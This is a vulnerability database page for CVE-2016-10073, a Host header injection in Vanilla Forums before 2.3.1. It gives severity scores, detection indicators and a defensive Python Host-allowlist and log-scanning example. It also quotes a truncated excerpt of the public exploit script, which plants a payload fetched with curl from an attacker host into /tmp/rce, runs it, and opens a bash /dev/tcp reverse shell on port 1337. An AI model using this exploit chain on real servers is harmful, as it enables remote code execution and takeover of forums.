CVE-2016-10073
Published 2017-05-23
Priority: P2 · 69 · high · CVSS 3.0: 7.5 · Exploit available
EPSS: 83.61% (99.7th percentile)
The from method in library/core/class.email.php in Vanilla Forums before 2.3.1 allows remote attackers to spoof the email domain in sent messages and potentially obtain sensitive information via a crafted HTTP Host header, as demonstrated by a password reset request.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vanillaforums | vanilla | <= 2.3.0 | 2.3.1 |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests to /entry/passwordrequest where the Host header contains shell commands, IP addresses, or non-domain values; a crafted Host header is the attack vector for CVE-2016-10073.
- Alert on POST requests to /entry/passwordrequest containing the parameter pattern 'hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password'; this is the exact POST body used in the public exploit.
- Detect outbound connections from the web server to attacker-controlled hosts on port 1337, indicative of the reverse shell callback stage of this exploit chain.
- Alert on creation or execution of /tmp/rce on the web server host; the exploit drops and executes a shell payload at this path.
- Inspect the Host header in password-reset requests for embedded bash TCP redirection syntax (e.g. /dev/tcp/), which is used to establish the reverse shell in this exploit.
- The vulnerability exists only in Vanilla Forums versions before 2.3.1; patched installations are not affected. Verify the deployed version before triaging alerts.
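As an added illustration of the first and fifth detection points above and of the underlying fix (this is example code, not from the page's sources or from Vanilla's own code base): the Host header is validated against a configured allowlist before it may feed absolute URLs or the mail From: domain, and password-reset requests whose Host fails that check are flagged from access logs. The allowlist, the log layout with Host as a trailing quoted field, and the sample lines are constructed assumptions.

```python
import re
from typing import Dict, Iterable, List, Optional

# Hostnames this deployment legitimately answers to (assumed; set per site).
ALLOWED_HOSTS = {"forum.example.com"}

# Strict DNS hostname syntax plus optional port. Shell metacharacters,
# paths, spaces or /dev/tcp/ fragments in the header fail this check.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?$", re.I)

def host_header_is_trusted(host: Optional[str]) -> bool:
    """True only if Host is syntactically a hostname AND on the allowlist.
    Absolute URLs (reset links) and the mail From: domain should be built
    from a configured canonical host, never from the raw request header."""
    if not host or not _HOSTNAME_RE.match(host):
        return False
    return host.split(":")[0].lower() in ALLOWED_HOSTS

# Combined access-log format extended with the Host header as a final
# quoted field (constructed layout for this example; adapt to your logs).
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*" '
    r'"(?P<host>[^"]*)"$')

def find_suspicious_reset_requests(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return password-reset requests whose Host header is not trusted."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        if (rec["path"].startswith("/entry/passwordrequest")
                and not host_header_is_trusted(rec["host"])):
            hits.append(rec)
    return hits

# Constructed sample log lines; only the 2nd and 3rd should be flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/May/2017:10:00:01 +0000] "POST /entry/passwordrequest HTTP/1.1" 200 512 "-" "Mozilla/5.0" "forum.example.com"',
    '203.0.113.9 - - [11/May/2017:10:00:05 +0000] "POST /entry/passwordrequest HTTP/1.1" 200 512 "-" "curl/7.52.1" "attacker.example"',
    '203.0.113.9 - - [11/May/2017:10:00:09 +0000] "POST /entry/passwordrequest HTTP/1.1" 200 512 "-" "curl/7.52.1" "evil.example;id"',
    '203.0.113.9 - - [11/May/2017:10:00:12 +0000] "GET /discussions HTTP/1.1" 200 2048 "-" "curl/7.52.1" "attacker.example"',
]

if __name__ == "__main__":
    for hit in find_suspicious_reset_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} Host={hit['host']!r} path={hit['path']}")
```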
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| NVD | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
No detection rules found.
Exploit-DB
CVE-2016-10073 [CRITICAL] Vanilla Forums < 2.3 - Remote Code Execution (exploitdb · 2017-05-11 · CVSS 9.8)
Vanilla Forums /dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# POST data string
data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
if [ $? -ne 0 ]; then
echo "[!] Failed conecting to the target URL. Exiting"
exit 2
fi
echo -e "\e[92m[+]\033[0m Connected to the target"
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
sleep 2s
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/usr/bin/nohup /bin/bash /tmp/rce"
p
Metasploit
HTTP Host Header Injection Detection (metasploit): checks if the host is vulnerable to Host header injection
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/142486/Vanilla-Forums-2.3-Remote-Code-Execution.html
- https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
- https://open.vanillaforums.com/discussion/33498/critical-security-release-vanilla-2-3-1
- https://www.exploit-db.com/exploits/41996/